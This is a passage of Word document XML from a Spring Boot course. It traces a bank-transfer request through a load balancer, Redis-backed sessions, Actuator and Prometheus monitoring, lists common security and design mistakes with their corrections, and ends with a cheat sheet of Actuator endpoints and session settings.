            <w:tcW w:type="dxa" w:w="6560"/>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Technology &amp; Role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Browser (Client)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Chrome/Firefox. Sends HTTP requests. Stores the JSESSIONID or JWT cookie. Runs JavaScript for client-side redirects in SPAs.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Load Balancer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AWS ELB / Nginx. Distributes requests across Spring Boot instances. Polls GET /actuator/health every 30 seconds. Stops routing to DOWN instances automatically.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Spring Boot (×3 instances)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Your application. Filter Chain → DispatcherServlet → Controllers → Services → Repositories. Runs on port 8080.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Spring Session + Redis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Shared session store. All 3 Spring Boot instances read/write sessions to the same Redis cluster. Sessions persist across server restarts.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PostgreSQL Database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Persistent data store. Accessed via Spring Data JPA (Hibernate). Connection pooled via HikariCP.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Spring Boot Actuator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Exposes /health, /metrics, /info, /loggers on port 8081 (internal). Collects JVM and business metrics via Micrometer.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Prometheus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Time-series metrics database. Scrapes /actuator/prometheus endpoint every 15 seconds. Stores metrics history.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Grafana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Dashboard and alerting tool. Visualizes Prometheus data in real-time dashboards. Sends alerts to Slack/PagerDuty when thresholds are breached.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2 A Complete User Journey — Tracing Every Step</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's trace a complete money transfer transaction from browser click to database commit, touching every component we have studied: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STEP 1 — LOAD BALANCER HEALTH CHECK:</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ELB polls: GET http://instance-1:8081/actuator/health → {"status":"UP"}</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ELB polls: GET http://instance-2:8081/actuator/health → {"status":"UP"}</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ELB polls: GET http://instance-3:8081/actuator/health → {"status":"DOWN"} ← DB conn failed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ELB stops routing to instance-3 automatically.</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STEP 2 — USER LOGIN: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Browser:  POST /login { username: 'john', password: 'secret'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Filter:   Spring Security validates credentials → OK</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Session:  Spring creates session, writes to Redis: { userId: 42, role: 'CUSTOMER'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Response: Set-Cookie: SESSION=xyz123; HttpOnly; Secure; SameSite=Strict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302 Location: /dashboard  ← PRG Pattern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STEP 3 — DASHBOARD LOAD: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Browser:  GET /dashboard  Cookie: SESSION=xyz123</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Filter:   Spring Security extracts session ID from cookie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Redis:    Lookup session by ID → finds { userId: 42, role: 'CUSTOMER'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Controller: Loads account data from PostgreSQL</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Metrics:  http.server.requests incremented (url=/dashboard, status=200)</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Response: 200 OK [dashboard HTML]</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STEP 4 — MONEY TRANSFER (POST):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Browser:  POST /api/transfer Body: { from: 'ACC-001', to: 'ACC-002', amount: 500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Cookie: SESSION=xyz123</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Filter:   Spring Security: session valid, CSRF token valid, role = CUSTOMER</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Service:  transferTimer.start()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BEGIN TRANSACTION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AccountRepository.debit(ACC-001, 500)</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AccountRepository.credit(ACC-002, 500)</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COMMIT TRANSACTION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transferTimer.stop() → records 187ms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successCounter.increment()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PRG:      attrs.addFlashAttribute('confirmation', 'TXN-98765')</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return 'redirect:/transfer/success' → 302</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STEP 5 — SUCCESS PAGE (GET):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Browser:  GET /transfer/success  Cookie: SESSION=xyz123</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Response: 200 OK [success page with confirmation number]</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User refreshes page → just a GET → safe, no re-execution</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STEP 6 — MONITORING (BACKGROUND):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Prometheus: GET http://instance-1:8081/actuator/prometheus (every 15s)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Grafana dashboard updates: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bank.transfers.success = 1,247 total</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bank.transfers.duration p99 = 187ms  ← within SLA</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hikaricp.connections.pending = 0  ← connection pool healthy</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jvm.memory.used = 234 MB / 512 MB max  ← memory healthy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D9488" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Module 8: Common Beginner Mistakes &amp; How to Avoid Them</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The following mistakes are extremely common in junior and mid-level developers. Understanding these mistakes deeply — not just what they are, but WHY they are wrong and WHAT the consequences are — is what separates architects from average developers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Mistake #1 — Sensitive Data in GET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thick" w:color="991B1B" w:sz="16"/>
              <w:bottom w:val="single" w:color="991B1B" w:sz="6"/>
              <w:right w:val="single" w:color="991B1B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="FEE2E2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="991B1B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">🚨  Mistake #1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">WRONG: GET /login?username=john&amp;password=secret
CORRECT: POST /login with credentials in the request body
Consequences of the mistake: The password appears permanently in browser history, server access logs, reverse proxy logs, CDN logs, and browser address bar (visible to anyone looking over your shoulder). In regulated industries (banking, healthcare), this is a compliance violation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Mistake #2 — No PRG Pattern After Form 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thick" w:color="991B1B" w:sz="16"/>
              <w:bottom w:val="single" w:color="991B1B" w:sz="6"/>
              <w:right w:val="single" w:color="991B1B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="FEE2E2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="991B1B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">🚨  Mistake #2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">WRONG: return "transfer-success"; (returns HTML directly after POST)
CORRECT: return "redirect:/transfer/success"; (PRG pattern)
Consequences: If the user presses F5 or the browser auto-refreshes, the POST request is re-submitted. In a banking application, this means the money transfer executes twice. In an order system, two orders are placed. In a healthcare system, double medication doses are recorded.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Mistake #3 — JWT Tokens in Local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thick" w:color="991B1B" w:sz="16"/>
              <w:bottom w:val="single" w:color="991B1B" w:sz="6"/>
              <w:right w:val="single" w:color="991B1B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="FEE2E2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="991B1B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">🚨  Mistake #3</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">WRONG: localStorage.setItem('authToken', jwtToken)
CORRECT: Store JWT in an HttpOnly cookie
Consequences: Any XSS attack — including from a compromised third-party JavaScript library — can steal the token with a single line of code. The attacker gains complete access to the user's account. XSS is one of the most common web vulnerabilities (OWASP Top 10).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Mistake #4 — Exposing All Actuator Endpoints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thick" w:color="991B1B" w:sz="16"/>
              <w:bottom w:val="single" w:color="991B1B" w:sz="6"/>
              <w:right w:val="single" w:color="991B1B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="FEE2E2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="991B1B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">🚨  Mistake #4</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">WRONG: management.endpoints.web.exposure.include=*
CORRECT: Only expose: health, info, metrics, prometheus
Consequences: /actuator/env exposes ALL environment variables including database passwords, API keys, and secrets. /actuator/heapdump allows downloading the entire JVM heap which may contain passwords, credit card numbers, and personal data in memory. /actuator/shutdown allows anyone to shut down your production server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Mistake #5 — In-Memory Sessions in Multi-Server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thick" w:color="991B1B" w:sz="16"/>
              <w:bottom w:val="single" w:color="991B1B" w:sz="6"/>
              <w:right w:val="single" w:color="991B1B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="FEE2E2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="991B1B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">🚨  Mistake #5</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">WRONG: Deploying without Spring Session when running multiple instances
CORRECT: Use Spring Session with Redis
Consequences: Users are randomly logged out mid-session whenever the load balancer routes them to a different server. Shopping cart items disappear. Multi-step forms (loan applications, checkout flows) lose data mid-process. This works perfectly in development (single server) and breaks silently in production.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Mistake #6 — Missing Cookie Security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thick" w:color="991B1B" w:sz="16"/>
              <w:bottom w:val="single" w:color="991B1B" w:sz="6"/>
              <w:right w:val="single" w:color="991B1B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="FEE2E2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="991B1B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">🚨  Mistake #6</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">WRONG: Not setting HttpOnly, Secure, and SameSite cookie flags
CORRECT: server.servlet.session.cookie.http-only=true, secure=true, same-site=strict
Consequences: Without HttpOnly, JavaScript can read the session cookie (XSS can steal sessions). Without Secure, the cookie is sent over HTTP connections (man-in-the-middle attacks). Without SameSite, the cookie is sent with cross-site requests (CSRF attacks).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D9488" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Quick Reference — Cheat Sheet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Actuator Endpoints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960"/>
        <w:gridCol w:w="1800"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:left w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:right w:val="single" w:color="CBD5E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A2B4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:left w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:right w:val="single" w:color="CBD5E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A2B4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3960"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:left w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:right w:val="single" w:color="CBD5E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A2B4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:left w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:right w:val="single" w:color="CBD5E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A2B4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Security</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/actuator/health</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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Application and component health status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Public (load balancer)</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/actuator/info</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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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App version, git commit, build info</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Public</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/actuator/metrics</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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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JVM and custom application metrics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ADMIN required</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/actuator/env</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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Environment variables and config values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ADMIN required</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/actuator/loggers</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GET + POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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View and change log levels at runtime</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ADMIN required</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/actuator/threaddump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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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All JVM thread states (diagnose deadlocks)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ADMIN required</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/actuator/heapdump</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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Download JVM heap dump (diagnose memory leaks)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ADMIN required</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/actuator/beans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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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All Spring beans in the ApplicationContext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ADMIN required</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/actuator/mappings</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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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All URL-to-controller mappings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ADMIN required</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/actuator/caches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GET + DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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View and clear application caches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ADMIN required</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/actuator/scheduledtasks</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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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All @Scheduled task configurations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ADMIN required</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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0D9488"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">/actuator/shutdown</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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Graceful app shutdown (disabled by default)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before="30" w:after="30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">ADMIN + internal only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Essential application.properties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SESSION SECURITY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server.servlet.session.timeout=30m</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server.servlet.session.cookie.http-only=true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server.servlet.session.cookie.secure=true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server.servlet.session.cookie.same-site=strict</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SPRING SESSION WITH REDIS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spring.session.store-type=redis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spring.data.redis.host=redis.internal</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spring.data.redis.port=6379</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spring.session.timeout=30m</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 ── ACTUATOR (PRODUCTION) 